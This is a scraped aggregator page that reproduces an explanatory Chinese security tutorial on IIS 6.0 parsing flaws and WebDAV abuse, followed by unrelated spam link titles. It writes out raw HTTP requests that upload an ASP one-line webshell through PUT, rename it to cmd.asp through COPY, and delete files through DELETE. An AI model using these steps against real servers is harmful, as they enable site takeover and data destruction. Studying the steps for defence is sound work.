当前位置: 首页 > news >正文

西安手机网站建设动力无限营销型网站建站步骤是什么意思

news 2025/11/6 9:12:24
西安手机网站建设动力无限,营销型网站建站步骤是什么意思,宁夏建设工程招标投标信息网站,58同城类似的网站开发IIS 6.0在解析文件时存在以下两个解析漏洞。 ①当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件来解析。 例如:建立文件夹 parsing.asp,在 parsing.asp 文件夹内新建一个文本文档 test.txt,其内容为&…

IIS 6.0在解析文件时存在以下两个解析漏洞。

①当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件来解析。

例如:建立文件夹 parsing.asp,在 parsing.asp 文件夹内新建一个文本文档 test.txt,其内容为<%=NOW()%>,然后在浏览器内访问。

“NOW()”是ASP提供获取当前时间的函数,TXT是文本文档格式,IIS是不会去解析此类文件的,应该会直接显示其内容,而在 parsing.asp文件夹中,却被当作ASP脚本来解析。

② 当文件为*.asp;1.jpg时,IIS 6.0同样会以ASP脚本来执行如:新建文件 test.asp;1.jpg,内容为<%=NOW()%>

微软并不认为这是一个漏洞,也一直没有推出IIS 6.0的补丁,所以这两个"漏洞"至今还存在,让无数的网站“死”在了IIS 6.0解析漏洞之上。

说到IIS容器,就不得不提起一个经典的漏洞,漏洞名为WebDav。

WebDav(Web-based Distributed Authoring and Versioning)是一种基于HTTP1.1协议的通信协议,它扩展了HTTP协议,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使HTTP协议更强大。

在开启WebDav扩展的服务器后,如果支持PUT、Move、Copy、Delete等方法,就可能会存在一些安全隐患,比如www.secbug.org服务器(IIS 6.0 Web容器)支持WebDav,并且存在PUT、Move、Copy、Delete等方法,那么攻击者就可能通过PUT方法向服务器上传危险脚本文件,测试步骤如下。

第一步:通过OPTIONS探测服务器所支持的HTTP方法。请求:

OPTIONS / HTTP/1.1 Host:www.secbug.org

响应:

HTTP/1.1 200 OK 
Cache-Control:private
Date: Mon,19 Aug 2013 09:41:45 GMT
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPPATCH, SEARC H,MKCOL,LOCK,UNLOCK Content-Length: 0 
Accept-Ranges: none 
Server: Microsoft-IIS/6.0 MS-Author-Via: DAV DASL:<DAV:sql>DAV: 1, 2
Public:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,POST,COPY,MOVE,MKCOL,PROPFIND,PROPPATCH,LOCK,UNLOCK,SEARCH Set-Cookie:_D_SID=89113465;path=/;

第二步:通过PUT方法向服务器上传脚本文件。

请求:

PUT/a.txt HTTP/1.1 
Host:www.secbug.org 
Content-Length:30 
<%eval request("chopper")%>

响应:

HTTP/1.1 201 Created
Date: Mon,19 Aug 2013 09:48:10 GMT
Allow:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,COPY,MOVE,PROPFIND,PROPPATCH, SEARCH,LOCK,UNLOCK Content-Length: 0
Location:http://www.secbug.org/a.txt Server: Microsoft-IIS/6.0

第三步:通过Move或Copy方法改名

COPY /a.txt HTTP/1.1 
Host:www.secbug.org
Destination:http://www.secbug.org/cmd.asp
HTTP/1.1 201 Created
Date: Mon,19 Aug 2013 09:53:43 GMT 
Content-Length: 0 
Content-Type: text/xml
Location:http://www.secbug.org/cmd.asp 
Server: Microsoft-IIS/6.0

通过这三个步骤,攻击者就可以轻易获取一个WebShell。

如果服务器开启了DELETE方法,攻击者还可以删除服务器上的任意文件。

DELETE /a.txt HTTP/1.1 Host:www.secbug.org
HTTP/1.1 200 OK
Date: Mon,19 Aug 2013 10:02:08 GMT 
Content-Length: 0 
Server: Microsoft-IIS/6.0
Set-Cookie: _D_SID=89113465;
path=/;

http://www.yayakq.cn/news/914141/

相关文章:

  • 建站公司做的网站侵权了如何将网站挂载域名
  • 合肥大型网站wordpress崩了
  • seo整站优化方案云南 网站建设网站
  • 注册网站多少钱东莞松山湖房价2022最新房价
  • 做生意网站200m网站空间多少钱
  • 转播网站如何做可以作为网页开发语言的是
  • 在哪网站可以做农信社模拟试卷如何查看域名是否备案
  • 网站论坛怎样建设网络建设与管理好找工作吗
  • 做网站 网络映射天元建设集团有限公司宋卫志
  • 济南优化网站技术郑州网站科技
  • 做动漫主题的网站网站产品数据如何恢复
  • 网站建设书籍附光盘绿色环保材料网站模板下载
  • 网站标题乱码网站建设的主要功能
  • 单页网站设计图片logo免费
  • 网站策划书10个点怎么写.net php开发网站开发
  • 全球网站域名网站怎么做内链
  • 做网站需不需要购买服务器竞价推广平台有哪些
  • 南昌网站建设赣icp南昌点击图片进入网站怎么做
  • wordpress怎么建立网站网站开发合同有效期
  • 国外的网站建设公司江阴企业网站建设哪家好
  • 比较好的能组数学卷的网站做教案的文山专业网站建设报价
  • 郑州做网站远辰上海虹口网站建设公司
  • 哪个网站做相册好asp动态链接生成网站地图
  • 手机网站建设团队图书网站开发背景
  • 仙居网站建设广安做网站
  • ip地址做网站长沙网络推广平台
  • 南京做网站南京乐识权威吴江做企业网站
  • 姓氏网站建设的意见和建议网站建设的开题报告
  • 创建个人主页网站wordpress太占内存
  • 在拼多多上怎么开网店太原网站优化服务